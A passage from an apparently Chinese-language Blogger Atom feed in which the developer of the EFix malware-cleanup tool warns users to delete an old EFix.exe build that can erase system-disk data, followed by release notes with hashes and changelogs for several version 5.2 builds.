scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>夭壽...</title><content type='html'>寫這類腳本軟體還真的要特別小心...&lt;br /&gt;&lt;br /&gt;以前犯的錯誤結果到現在都還有在流傳0rz&lt;br /&gt;&lt;br /&gt;也不過就放上來兩天而已..&lt;br /&gt;&lt;br /&gt;這邊一樣特別提醒&lt;br /&gt;如果您手邊有EFix檔案名稱叫做&lt;span style="color: rgb(255, 0, 0);"&gt;EFix.exe&lt;/span&gt;的，請務必將他刪掉&lt;br /&gt;那是有問題的版本.&lt;br /&gt;W2K如果你有先執行新版本在執行可能還沒事，因為新版有對那一個超舊版作一個檔案補充避免執行後出問題&lt;br /&gt;但如果你是直接執行&lt;span style="color: rgb(255, 0, 0);"&gt;EFix.exe&lt;/span&gt;的話，&lt;span style="color: rgb(255, 0, 0);"&gt;會有一定機率刪除掉系統磁碟內所有資料.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;這問題我一發現之後馬上就將檔案刪除並整個重寫，現在是不會有這種情形了.&lt;br /&gt;但那時流出去的檔案我並沒有辦法回收，所以我這邊也只能呼籲&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;千萬不要再用EFix.exe 這一個檔案名稱的EFix去修復您的系統&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;除了現在沒辦法應對新變種的惡意程式了.還有機會造成你系統資料遺失&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6934584540892532002?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6934584540892532002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6934584540892532002'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/07/blog-post.html' title='夭壽...'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1434828923860528626</id><published>2009-07-16T17:15:00.004+08:00</published><updated>2009-07-16T17:28:19.813+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090716.38</title><content type='html'>版本: 5.2 20090716.38&lt;br /&gt;&lt;br /&gt;檔案資訊:&lt;br /&gt;File size: 906090 bytes&lt;br /&gt;MD5...: 00093bb5ba5822971f2f68188ce5526b&lt;br /&gt;SHA1..: 4d4526b62a93ee40bf5c65cf466583149af0668b&lt;br /&gt;&lt;br /&gt;測試過的作業系統:&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows Vista Homebasic&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;修改事項:&lt;br /&gt;修正檢測執行中程序時碰到:中斷的問題&lt;br /&gt;增加安全性更新KB961371和KB973346的檢查.沒有更新會列舉出來&lt;br /&gt;修改建立系統還原執行方式，以前是每一次執行都會建立一次，這次改過是只有當天的第一次執行EFix才會建立，之後當天就不建立了節省磁碟空間.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1434828923860528626?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1434828923860528626'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1434828923860528626'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/07/efix-ver-52-2009071638.html' title='EFix Ver 5.2 20090716.38'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1024357208027762900</id><published>2009-07-10T15:13:00.003+08:00</published><updated>2009-07-10T15:21:12.522+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090710.36</title><content type='html'>版本：5.2 20090710.36&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 906002 bytes&lt;br /&gt;MD5...: d5de47893d567c4f0d1ec36a00be7367&lt;br /&gt;SHA1..: dec8291f0cb1ab021c304b9e031182c342f376eb&lt;br /&gt;&lt;br /&gt;測試過的環境：&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows Vista&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;修改資訊：&lt;br /&gt;........忘記了0rz&lt;br /&gt;只記得一個是修改文字資訊而已&lt;br /&gt;還有一個是修改掃描報告中的執行中程序列舉增加微軟數位簽章檢查&lt;br /&gt;有過會顯示"&lt;verified&gt;Verified"&lt;verified&gt;&lt;/verified&gt;&lt;/verified&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1024357208027762900?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1024357208027762900'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1024357208027762900'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/07/efix-ver-52-2009071036.html' title='EFix Ver 5.2 20090710.36'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5768147131812228600</id><published>2009-07-07T16:28:00.002+08:00</published><updated>2009-07-07T16:30:38.702+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090707.35</title><content type='html'>版本：5.2 20090707.35&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 906443 bytes&lt;br /&gt;MD5...: c7f438a3620378732b0ff4e3f5d65b38&lt;br /&gt;SHA1..: 094a58d6fc843a1497d32cedfd5ac11c44dbfa41&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正一些無關緊要的錯誤&lt;br /&gt;增加之前批次大修改忘記加進去的東西.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;補充：&lt;br /&gt;這一次有測試Vista HomeBasic可以正常使用&lt;br /&gt;Win2000找不到機器測..不過應該也是ok.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5768147131812228600?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5768147131812228600'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5768147131812228600'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/07/efix-ver-52-2009070735.html' title='EFix Ver 5.2 20090707.35'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry></feed>
